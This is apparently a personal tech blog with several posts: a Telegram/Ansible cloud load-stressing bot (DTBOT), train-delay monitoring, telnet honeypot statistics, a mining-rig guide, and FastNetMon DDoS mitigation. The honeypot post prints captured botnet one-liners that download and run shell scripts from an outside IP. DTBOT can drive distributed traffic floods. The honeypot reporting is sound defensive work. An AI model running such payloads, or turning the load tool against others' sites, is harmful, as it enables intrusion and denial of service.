Loadstressing from the cloud with DTBOT
Today I finally decided to open-source some of the code I wrote to reach my maximum level of laziness: automatically loadstressing web infrastructures via Telegram.
The other challenge was to see/prove whether Golang can be a replacement/alternative for Python scripting. Repo: https://github.com/fnzv/DTBOT
Here is a diagram to better explain what I wanted to do:
Disclaimer before I even start
I’m not responsible for anything you do with this tool; it was made only for legit loadstressing/benchmarking of YOUR OWN web infra.
I know that most of the code could be written more efficiently/better, don’t hate on my exec_shell() ahah
End of disclaimer. The main “ingredients” are:
- Ansible
- Golang
- Telegram
- At least one cloud provider with some resources
It all starts with the Telegram bot, which keeps listening for commands from the configured, allowed “chat_id”; whenever a predefined command is sent, the bot (written in Golang) runs the Ansible playbook with extra args and gives feedback to the user via Telegram.
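To give an idea of how little glue this needs, here is a minimal sketch of that dispatch loop (not DTBOT’s actual code: it assumes the go-telegram-bot-api library, and the token, chat_id and playbook arguments are placeholders modeled on the log line shown below):

package main

import (
	"log"
	"os/exec"
	"strings"

	tgbotapi "gopkg.in/telegram-bot-api.v4"
)

func main() {
	bot, err := tgbotapi.NewBotAPI("TELEGRAM-BOT-TOKEN") // token from dtbot.conf
	if err != nil {
		log.Fatal(err)
	}
	log.Printf("Authorized on account %s", bot.Self.UserName)

	allowed := int64(123456789) // the allowed chat_id from dtbot.conf

	u := tgbotapi.NewUpdate(0)
	u.Timeout = 60
	updates, err := bot.GetUpdatesChan(u)
	if err != nil {
		log.Fatal(err)
	}

	for update := range updates {
		// Ignore non-message updates and any chat that isn't whitelisted
		if update.Message == nil || update.Message.Chat.ID != allowed {
			continue
		}
		fields := strings.Fields(update.Message.Text)
		if len(fields) == 2 && fields[0] == "/create" {
			// Same shape as the logged command shown below
			out, err := exec.Command("ansible-playbook", "-vv",
				"/etc/dtbot/playbooks/create-infra.yaml",
				"--extra-vars=total_nodes="+fields[1]).CombinedOutput()
			if err != nil {
				log.Println("playbook failed:", err)
			}
			bot.Send(tgbotapi.NewMessage(allowed, string(out)))
		}
	}
}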
This is a classic example of loadstressing from OpenStack using DTBOT:
1) The user writes “/create 5” to the loadstresser bot chat, which triggers the bot to execute the underlying Ansible playbook and deploy 5 VMs using the configured OpenStack credentials.
If you check the logs (/var/log/dtbot.log) and have a bit of Ansible background, you can understand what’s really happening:
2018/05/19 14:35:46 Command: source /etc/dtbot/os_creds && ansible_python_interpreter=/usr/bin/python3 ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook -vv /etc/dtbot/playbooks/create-infra.yaml --extra-vars="total_nodes=5 telegramtoken=botTOKEN telegramchatid=CHATID"
2) After a few minutes the user receives feedback that the VMs are ready, and can start loadstressing with:
/load http://example.org <Num clients> <Num VMs involved> <Time in seconds>
The /load command was defined for simplicity and uses wrk (https://github.com/wg/wrk) as the stresser, which works great out of the box without complex configuration files.
After some time spent loadstressing I decided to add a bit of complexity with JMeter configurations and custom bash scripts, so any user can configure or use their own loadstressing tool (JMeter, vegeta, nghttp2, locust.io…).
The commands defined for custom JMeter scripts are /loadj (OpenStack) and /loadj_aws (AWS), which follow the exact same workflow as before (Telegram -> Golang -> Ansible) but load a remote configuration file (a .jmx in the case of JMeter) and execute the tool with that custom configuration file.
Note: the remote configuration file must be RAW (a gist/any pastebin can be used for this).
Example: /loadj <URL> <Num VMs involved>, or /loadj_aws <URL> to run the .jmx conf on all AWS nodes. You can find a simple .jmx example inside the repo under examples/
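Under the hood the per-node idea boils down to “fetch the raw file, run the tool against it”. A hedged sketch (not the repo’s code; the gist URL is a made-up placeholder, and -n/-t are JMeter’s standard non-GUI flags):

package main

import (
	"io"
	"log"
	"net/http"
	"os"
	"os/exec"
)

func main() {
	// Fetch the RAW .jmx (placeholder URL: it must serve the plain text)
	resp, err := http.Get("https://gist.githubusercontent.com/someuser/someid/raw/test.jmx")
	if err != nil {
		log.Fatal(err)
	}
	defer resp.Body.Close()

	f, err := os.Create("/tmp/test.jmx")
	if err != nil {
		log.Fatal(err)
	}
	if _, err := io.Copy(f, resp.Body); err != nil {
		log.Fatal(err)
	}
	f.Close()

	// Run JMeter headless against the downloaded test plan
	out, err := exec.Command("jmeter", "-n", "-t", "/tmp/test.jmx").CombinedOutput()
	if err != nil {
		log.Println(err)
	}
	os.Stdout.Write(out)
}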
If you reached this point and are still asking what DT stands for… well, it’s just “DownTime” :)
Brief how-to/usage (more info in the GitHub repo):
1) Create a bot and save the bot token; you can do it by writing “/newbot” to BotFather (https://telegram.me/botfather)
2) Use the Quick-Install of dtbot on an Ubuntu 16.04 machine and configure it.
Required configuration files are located under /etc/dtbot/:
- dtbot.conf (chat ID and Telegram token; to find your chat id, just write some messages to your bot and then open this URL in the browser: https://api.telegram.org/bot<YourBotToken>/getUpdates)
- os_creds (if you want to create VMs on the OpenStack provider) - OpenStack credentials source file
- aws_creds (if you want to create VMs on AWS) - AWS ACCESS and SECRET key source file (you just need the exports for those environment variables)
3) (Re)start dtbot via systemd: service dtbot restart
If everything is fine you should see “Authorized on account BOT_NAME” in /var/log/dtbot.log
3.5) Take some time to adjust the Ansible playbooks based on your cloud environment (AWS or OpenStack):
/etc/dtbot/playbooks/aws-create-infra.yaml - You can keep it as-is, but you need to change “key_name:” to a key present in your account; this VM must be able to SSH into the newly created AWS instances with that key, so generate a new key on the machine and add it to AWS.
/etc/dtbot/playbooks/create-infra.yaml - The only parts that need to be changed are the “flavor:” and “image:” names, which vary based on the OpenStack provider.
- Other changes that might be needed are the same ones, but on the other playbooks too: info.yaml, ddos.yaml (OpenStack flavor, image).
4) Try to send some commands to your Telegram bot:
/help - Shows the command list
/create N - Deploys N VMs on OpenStack; multiple runs won't deploy more VMs but just check that N VMs are present
/create_aws N - Deploys N VMs on AWS; multiple runs will deploy more VMs
/stop N - Stops loadstressing tasks on N VMs (OpenStack)
/stop_aws - Stops all loadstressing tasks on ALL AWS VMs
/destroy N - Deletes N VMs created on OpenStack (0 to N)
/destroy_aws - Deletes ALL loadstressing VMs created on AWS (will just shut off all VMs accessible with the dtbot key; they are then deleted because of 'delete on shutoff')
/load <URL> <Num clients> <Num VMs involved> <Time in seconds> - Starts loadstressing from N OpenStack VMs
/load_aws <URL> <Num clients> <Time in seconds> - Starts loadstressing from ALL created AWS VMs
/loadj <URL> <Num VMs involved> - Executes the given JMeter .jmx script on N VMs (OpenStack); the URL must be raw, displaying the text directly
/loadj_aws <URL> - Executes the given JMeter .jmx script on all AWS VMs; the URL must be raw, displaying the text directly
/load_custom <URL> <Total nodes> - Executes the provided custom bash script on OpenStack VMs; the URL must be raw, displaying the text directly
/load_custom_aws <URL> - Executes the provided custom bash script on all AWS VMs; the URL must be raw, displaying the text directly
/info N - Gathers info on N OpenStack VMs (established connections and ifconfig stats), useful to check the current stress-test status (example: start /load, then after all the VMs have started check /info N to see stats/data)
5) Start loadstressing and tune your infra cache, DB & webserver… repeat :)
Pro-Tips:
- The bot can be added to Telegram groups and will accept commands from all members of the group; just find out the chat_id of the group and add it to dtbot.conf
- Check the logs at /var/log/dtbot.log to see what’s happening, and if needed change parameters/values in the Ansible playbooks.
- Manually execute Ansible on the dtbot VM to see if something is wrong (ansible-playbook -vv; you can copy/paste the command from the logs)
- On AWS use a different region from your production env
Monitoring trains the sysadmin way
After discovering that the sites viaggiatreno.it and lefreccie.it kindly offer some APIs over their train data, I decided to implement my own monitoring system to get a complete overview of what is happening in the public train system and never miss a train.
Master Plan:
1) Scrape all the available data (train departures/arrivals, delays, stations…)
2) Standardize the format so I can implement pluggable systems (Grafana, Telegram bot, website, Twitter…)
3) At least have fun when I hear “We are sorry for the inconvenience” while I check my systems
Scraping all the relevant datasets
All the data is collected by a script every 30 minutes, using the site APIs and station lists as input; the output is saved into InfluxDB (legit delay-time tracking with a time-series DB) and into a local folder for historical data that I will use later with git.
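For the InfluxDB part, a write is just line protocol POSTed to the HTTP endpoint. A minimal sketch against InfluxDB 1.x (database name, measurement and tag names are my own illustration, not the project’s real schema):

package main

import (
	"fmt"
	"log"
	"net/http"
	"strings"
	"time"
)

func main() {
	// One scraped sample: train 2034, last seen 7 minutes late
	point := fmt.Sprintf("delay,train=2034,station=MILANO_CENTRALE minutes=7i %d",
		time.Now().UnixNano())
	resp, err := http.Post("http://localhost:8086/write?db=trains",
		"application/octet-stream", strings.NewReader(point))
	if err != nil {
		log.Fatal(err)
	}
	resp.Body.Close()
	log.Println("write status:", resp.Status) // expect 204 No Content
}

Each sample lands as a timestamped point, which is what makes the delay graphs later on trivial.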
Standardize format
To allow multiple systems to communicate with each other, you always need to take the raw data (train datasets) and standardize it into a more pluggable format:
- InfluxDB (Pros: a lot of client support, Grafana, alerts, SQL… Cons: a bit more resource usage)
- Git + local files (Pros: efficient historical data tracking and easy full-text search… Cons: none)
Developing “Pluggable” systems:
- The Grafana dashboard gathers all the relevant metrics that I cherry-picked from InfluxDB (train departure/arrival, delay, last station detected, train number, timestamp).
With this dataset I could easily create a dashboard that really gives you all the information you can see on the station information displays.
- The Telegram bot https://t.me/Trenordalerts_bot is written in Go, and in under 300 lines of code it can read all the collected delay data and communicate it to the user.
The alerting part of the bot is more complex than the “give me info on train xyz” part, because I need to identify the user before sending an alert (obviously… I don’t want to receive alerts about my friend’s train), so I implemented a connector to a relational DB where I track chat_ids and alerts.
- Static website https://trenistats.it
This is where the magic happens; the flow of the data is very simple now, and I just need to gather data from one of my inputs (InfluxDB, git or the local dir) and show some graphs. How? The HTML code is automatically generated by a script that collects the data from the local repo and generates the index.html for the static site (a minimal sketch of such a generator follows this list). Even if I’m not a frontend specialist, I managed to make something cool out of it (pure Google-fu skills and design 101).
- Twitter bot https://twitter.com/trenistats
The bot gathers information from the local repo and triggers alerts via the Twitter APIs if trains start having/keep having long delays, tagging the main Italian company responsible for the transportation system. Like the Telegram bot, this is written in Go with very few lines: basically what I had already done for Telegram, plus the Twitter API integration.
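As promised above, a minimal sketch of the index.html generator (assuming the delays were already parsed out of the local repo; the template and field names are mine, not the site’s actual code):

package main

import (
	"html/template"
	"log"
	"os"
)

type Delay struct {
	Train   string
	Minutes int
}

var page = template.Must(template.New("index").Parse(
	`<html><body><h1>Today's delays</h1><ul>
{{range .}}<li>Train {{.Train}}: {{.Minutes}} min late</li>
{{end}}</ul></body></html>`))

func main() {
	// In the real flow these would be parsed from the scraped files
	data := []Delay{{"2034", 7}, {"609", 15}}
	f, err := os.Create("index.html")
	if err != nil {
		log.Fatal(err)
	}
	defer f.Close()
	if err := page.Execute(f, data); err != nil {
		log.Fatal(err)
	}
}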
That’s it; I could have gone further into dashboarding and alerting, but this setup seems to work fine for me.
I tried integrating Elasticsearch + Kibana for more fun stuff, but Influx + Grafana did the job very well (it just works… and no JSON decoding fights).
Some (fun) stats from a running Telnet honeypot (YAFH)
Telnet sessions:
netstat -peanut | grep 23 | grep ESTABLISHED | wc -l
185
Total connections received last month:
grep CONNECTION yafh-telnet.log | wc -l
644
Most common wget/busybox attempt (don’t run it… I implemented accidental copy-pasta protection here with the leading #):
# /bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\x0181c46036\x7f'; /bin/busybox printf '\00281c46036\177'; /bin/echo -ne '\x0381c46036\x7f'; /usr/bin/printf '\00481c46036\177';
Top 15 passwords used (the honeypot was designed to allow access with any password):
<empty> 1234 password admin 12345 1234 Win1doW$ user pass aquario (??Really??) admin 888888 7ujMko0admin 666666 5up 54321 1234567890 123456 1111 12345
One-liner of the year goes to:
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://165.227.121.222/bin.sh; sh bin.sh; wget1 http://165.227.121.222/bin2.sh; sh bin2.sh; tftp -r tftp.sh -g 165.227.121.222; sh tftp.sh; tftp 165.227.121.222 -c get tftp2.sh; sh tftp2.sh;mv /bin/wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin/wget /usr/bin/-wget;mv /sbin/wget /bin
(the same payload was pasted back-to-back many times in a single session; one copy is enough to get the idea)
What really surprises me in these stats is the number of constantly active sessions (185) that these C2s keep open to telnet devices, even when the device is a fake honeypot that records every command.
I’m still looking for a cool wget payload to analyze and have fun with in a sandboxed environment, but as of today only old wgets and common commands are getting into the honeypot.
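For the curious, the core trick of such a honeypot is tiny. This is not YAFH’s actual code, just a minimal sketch of a fake telnet-style service that accepts any password and logs every command:

package main

import (
	"bufio"
	"fmt"
	"log"
	"net"
)

func handle(c net.Conn) {
	defer c.Close()
	s := bufio.NewScanner(c)
	fmt.Fprint(c, "login: ")
	s.Scan()
	user := s.Text()
	fmt.Fprint(c, "password: ")
	s.Scan() // any password is accepted
	log.Printf("CONNECTION %s user=%q pass=%q", c.RemoteAddr(), user, s.Text())
	fmt.Fprint(c, "# ")
	for s.Scan() {
		log.Printf("CMD %s %q", c.RemoteAddr(), s.Text())
		fmt.Fprint(c, "# ") // pretend every command succeeded
	}
}

func main() {
	ln, err := net.Listen("tcp", ":2323") // real telnet is port 23 (needs root)
	if err != nil {
		log.Fatal(err)
	}
	for {
		c, err := ln.Accept()
		if err != nil {
			continue
		}
		go handle(c)
	}
}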
Link to the project: https://github.com/fnzv/YAFH
Setting up your first Mining rig (Using Ubuntu 16.04 LTS Server)
A few months ago I started getting more and more interested in crypto, and now I can share my experience with mining.
At the very beginning of mining, many were attracted by Bitcoin since the difficulty was so low that everyone with some spare GPUs could be an active node of the Bitcoin network and earn some satoshi. Nowadays this is still a thing, but the miners have evolved: investors came into the game with huge datacenters full of ASICs and 13-GPU rigs dedicated to mining a single coin, pushing the difficulty to the very top and causing low-budget miners to shut off their rigs, since you cannot make any profit with just a bunch of GPUs.
What happened next? Different coins started becoming profitable, allowing more GPU owners to jump into the mining game with other cryptocurrencies like Ethereum, Zcash, Ethereum Classic, Monero and many others. If you noticed GPU prices this summer, you probably saw that the value of AMD/Nvidia GPUs was incredibly high, and the European/American market started struggling to find those cards as “mining whales” started buying 300-400 cards per order, making hobbyists’ and gamers’ lives harder. Ok cool, now I see that Ethereum/Zcash/Monero/…coin xyz… is still PoW (Proof of Work) and I can mine coins until the end of 20xx; how can I start mining?
First of all, you need to consider that mining takes a lot of energy, at least 80-140W per card depending on under/overclock settings, so if your electrical system cannot sustain the total power draw you cannot start mining there.
After you have made your electrical considerations you can start setting up your mining rig. The only components necessary for mining are:
- Multiple GPUs: Depending on the algorithm, you need to choose the best hashrate per watt. For example, if you want to mine only Zcash, the best GPUs for this coin are Nvidia ones, because their hardware architecture (Pascal) is much more effective with coins like Zcash, whereas AMD cards perform better on Ethereum-like coins (just look for AMD RX 4xx/5xx vs Nvidia GTX 10xx benchmarks and see the hashrate-per-watt differences).
- Motherboard: This is a key choice because it will decide how many GPU cards you can fit into a single rig. The best options are the “BTC edition” boards (motherboards designed for BTC mining) because they can fit up to 6-13 PCI-e slots.
- CPU: The only requirement for the CPU is that it supports the motherboard socket; but in case you want to start CPU mining, then you need to search for the most appropriate CPU and rethink the motherboard choice.
- PSU: Another important choice is the power supply, not only for the connectors (if you have 5 or more GPUs, take into account that you need 5 PCI-e power connectors plus another 5 for the risers) but also for wattage and efficiency. Don’t be cheap on the quality and take only Gold/Silver/Platinum PSUs (see the worked sizing example after this list).
- Storage: SSD drives today are cheap and draw less power than standard HDs; you need up to 60GB, depending on the mined coin and whether you need to store the complete blockchain.
- Risers: These connectors allow you to fit multiple GPUs onto a single motherboard; you cannot keep 6+ GPUs directly connected to the motherboard, so you need to extend the PCI-e slots.
Important consideration: risers (SATA or Molex) must be fed from different cables, not all from the same PSU cable, because the amperage can burn connectors (they should each draw less than 70W). What you can do:
4 GPUs –> directly connected to the PSU PCI-e power connectors (example: 2 cables from the PSU with 2 PCI-e power connectors each)
4 risers –> converted to SATA –> 2 PSU SATA cables (NO MORE THAN 2 SATA CABLES PER POWER CABLE FROM THE PSU)
The best option would be one cable per riser connector/GPU, but for that you would end up needing at least 2-3 PSUs; many people say that the limit is 2-3 connectors on the same power cable coming from the PSU.
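A worked sizing example (my ballpark numbers, not a rule): 6 GPUs at ~120W each is 720W, plus ~10W per riser (60W) and ~100W for CPU, motherboard and SSD, gives roughly 880W at the wall; a quality 1000-1200W Gold unit leaves headroom for overclocking, while anything much beyond 6 cards is usually easier to split across two PSUs.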
After you have got all the hardware, you just need to connect it all (if you don’t have experience you can google how to build a PC; it’s basically the same thing) and choose your OS:
- EthOS - Mining distro based on Ubuntu, with all the drivers/mining scripts ready
- SMOS - Mining OS, much like EthOS
- Pure Windows - Install the OS, check for the correct GPU drivers and use MSI Afterburner or EVGA Precision for overclocking (some have issues with Windows 10 and have switched to 7 for driver stability)
- Ubuntu 16.04 - If you have some Linux experience this is your best option; you only need to install/compile the correct drivers and start mining
Setting Up your Ubuntu 16.04 Miner (Nvidia):
Adding the graphics drivers repository:
sudo apt-add-repository ppa:graphics-drivers/ppa
sudo apt-get update
Installing the drivers and Nvidia SMI:
sudo apt-get install nvidia-smi
sudo apt-get install nvidia-384
** To correctly run the Nvidia drivers you must install startx and configure the GPUs with “fake” screens, as there is no GUI on Ubuntu 16.04 LTS Server (the files you should configure are /root/.xinitrc for OC settings and /etc/X11/xorg.conf for the “fake” screens attached to the GPUs).
Now you just have to choose your miner and mining pool and start mining (I assume you already have a wallet for the coin you want to mine).
Examples:
EWBF Miner –> Zcash
Ethminer –> Ethereum
ccminer –> Monero
Most of those miners have example scripts inside, so you only need to change the wallet/pool settings:
EWBF:
0.3.4b/miner --server POOL-ADDRESS --user WALLET-ADDRESS.RIG-NAME --pass z --port 3333 --pec --log 2 --logfile /var/log/ewbf.log --tempunits C --templimit 85
To start mining you just have to launch the mining script (inside a screen session, to keep the script active even when you close the terminal) and keep an eye on the GPU/connector temps (green zone is 50-70°C, warning zone 70-80 but still ok, critical zone 80-90, GPU lock/automatic driver stop at 90-100). Some of the best-known mining pools are:
- https://nanopool.org
- http://dwarfpool.com/
- https://zcash.flypool.org/
- https://ethermine.org/
- http://nicehash.com/
Almost every mining pool will let you see statistics via web and/or alert you via email if the miner shuts down.
You can also set up your own pool, but it only makes sense if you have enough hashrate: if you have 1-5 rigs just go for a shared mining pool, whereas if you have 20+ rigs you can start thinking about solo mining so all profits are maximized.
Remote control is quite easy: since this is a Linux-based system, you can port-forward the SSH port on your router and enable SSH-key authentication for remote management (filter the IP ranges with iptables if you know that you will connect only from provider X).
Other alternatives are:
- OpenVPN on the rig –> port-forward the OpenVPN port –> connect to the VPN via an Android device –> SSH or miner API management via VPN
- A Telegram bot listening for your commands that sends you information about the miner (for example the trsh script: https://github.com/fnzv/trsh –> create custom commands, e.g. /gpu_stats –> gives you back the GPU statistics)
- Setting up a VPN on your router and connecting to your rig from there (OpenWRT, DD-WRT & co.)
- … your own backdoor :)
After you are up and running, just HODL and keep mining.
How to detect & mitigate (D)DoS Attacks using FastNetMon
Recently I was researching a lot on the various denial-of-service attacks and how to mitigate them from layer 1 to 7. As always, the most convenient way to stop any attack is keeping the bad requests/traffic away from your services starting from the first layers of the ISO/OSI model. Realistically, the only ways to prevent DDoS attacks are:
a) Layer 3-4 mitigation with BGP/cloud scrubbing (sending all your network traffic via BGP or ‘sophisticated’ VPNs to third-party POPs to delegate attack mitigation).
- Pros: This is the only smart way to properly mitigate attacks; your services won’t be hit by attacks/malicious traffic.
- Cons: Paying an external provider & bandwidth costs. All your traffic is re-routed, so latency, packet loss and any other network issue that hits the external provider affects you directly… and yes, there can be false positives, and customers may be locked out of their services.
b) DNS obfuscation/CDN mitigation/proxying only legit requests; a well-known example is CloudFlare (kinda like security through obscurity… it works only if you have certain services and know your stuff).
- Pros: If you only have HTTP(S) services exposed this is a great option, and it’s cheap or free (you can also set up your own private proxying with Nginx on some VPS/cloud provider with DDoS protection).
- Cons: Doesn’t work well if you have other exposed services like email servers or FTP, or any dedicated public network assigned to you (example: if you are a carrier you can’t just hide your site behind DNS, since they will hit your announced AS networks…).
c) Layer 6-7 mitigation using server/service-side countermeasures (enabling Nginx rate limiting, cache filtering, Apache mod_security & mod_evasive bans…).
- Pros: Easy to configure, and some low-end attacks can be mitigated (example: website scans, automated bots/aggressive crawlers…).
- Cons: A real attack will saturate your uplink and bring down all your services.
d) DIY DDoS protection using Linux boxes and the good old packet filter.
- Pros: It’s free, it just works; you only need to create your own “patterns” and attack/network blacklists.
- Cons: You need at least 100G uplinks and expensive dedicated servers to process all the incoming/outgoing traffic fast enough. You have to manage all the network issues yourself, and if you saturate the link with your upstream BGP provider they may drop your traffic and/or blackhole you anyway, as no one wants unwanted bandwidth costs & links saturated by malicious traffic or bogus packets.
Before you even think of option d), watch this:
Cool, but how do I detect attacks? Well, if you have $$ and only believe in enterprise stuff, grab that 500+ grand network box and put it in front of your DC… whereas if you are an opensource guy you can go for FastNetMon (by Pavel Odintsov) and set up your own anti-DDoS detection/mitigation solution.
What is FastNetMon?
FastNetMon is a DDoS analyzer that lets you detect attacks or suspicious traffic in near real time (example: VPS X is compromised and starts a SYN flood against outbound nets –> detected and alerted by FNM). FNM isn’t just a detection tool; it also helps to mitigate attacks: when a ban rule is triggered, a bash script is executed (and there is a lot of ‘extra’ stuff you can do: Slack webhooks… keeping Influx metrics… email alerts… sending an emergency call/SMS… BGP announcements… shutting off the VPS).
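To give an idea, here is a hedged sketch of such a ban/unban handler, written in Go instead of bash (FNM normally calls a shell script; the ip/direction/pps/action argument order mirrors the stock notify_about_attack.sh, so double-check it against your FNM version):

package main

import (
	"log"
	"os"
	"os/exec"
)

func main() {
	if len(os.Args) < 5 {
		log.Fatal("usage: notify <ip> <direction> <pps> <ban|unban>")
	}
	ip, action := os.Args[1], os.Args[4]
	switch action {
	case "ban":
		// Null-route the host locally; on a real edge you would rather
		// announce a BGP blackhole via GoBGP/ExaBGP
		if err := exec.Command("ip", "route", "add", "blackhole", ip+"/32").Run(); err != nil {
			log.Println(err)
		}
	case "unban":
		exec.Command("ip", "route", "del", "blackhole", ip+"/32").Run()
	}
}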
Scenario 1:
A VPS provider protects customers on hypervisor X with FNM; when an attack is detected in the NetFlow/sFlow/IPFIX traffic, the bash script automatically adds a blackhole rule on the edge network device/hypervisor host to avoid degrading network performance for the other customers.
Scenario 2:
A carrier needs to monitor the traffic flows on their network boxes; they set up FNM, gather all the flows to monitor their subnets, and re-route traffic (GoBGP & ExaBGP are supported by FNM) when links get saturated.
…and so on.
The FNM setup is quite easy to get up and running; the tricky part is setting up the Grafana/InfluxDB metrics, but that’s not a problem if you are only interested in detection/mitigation.
If you are into dashboarding you could also set up an ELK stack (the icing on the cake) to gather NetFlow data and create great visualizations with Kibana (total PPS in, top “talkers” for outgoing/incoming traffic, traffic categories, sorting by TCP/UDP…). The only requirements are:
- A small server/virtual machine that will receive all the flow traffic from the routers/switches via a capture backend
- For automated BGP integration, the server must be allowed to talk directly to the routers/switches
Links and resources:
- GitHub documentation
- FastNetMon site (thank you Pavel for this project)
- Managing flows (a great tool from Paolo Lucente): if you want to collect flows properly you can use nfacct
For any question & discussion, don’t hesitate to contact me.